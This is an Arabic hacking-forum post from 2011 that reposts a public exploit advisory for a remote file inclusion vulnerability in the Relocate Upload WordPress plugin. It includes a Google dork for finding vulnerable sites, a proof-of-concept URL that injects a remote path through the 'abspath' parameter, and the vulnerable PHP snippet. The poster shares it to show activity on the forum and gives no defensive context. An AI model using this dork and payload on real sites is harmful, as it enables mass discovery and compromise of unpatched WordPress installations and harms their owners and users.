عرض مشاركة واحدة
قديم 09-20-2011, 05:50 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
hank00sh
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

.......... ثغره في سكربت ورد برسس ريموت فايلن انكلود


السلام عليكم ورحمة الله وبركاته

اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات

شوفت ثغرات جديده كلها في الورد برسس

ومنها هذي الثغره

كود PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
 
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       
// WP setup and function access
        
define('WP_USE_THEMES'false);
        require_once(
urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter 
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي

بس يارب الثغره تعجبكم

تحياتي لكم


eyvi td s;vfj ,v] fvss vdl,j thdgk hk;g,]

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس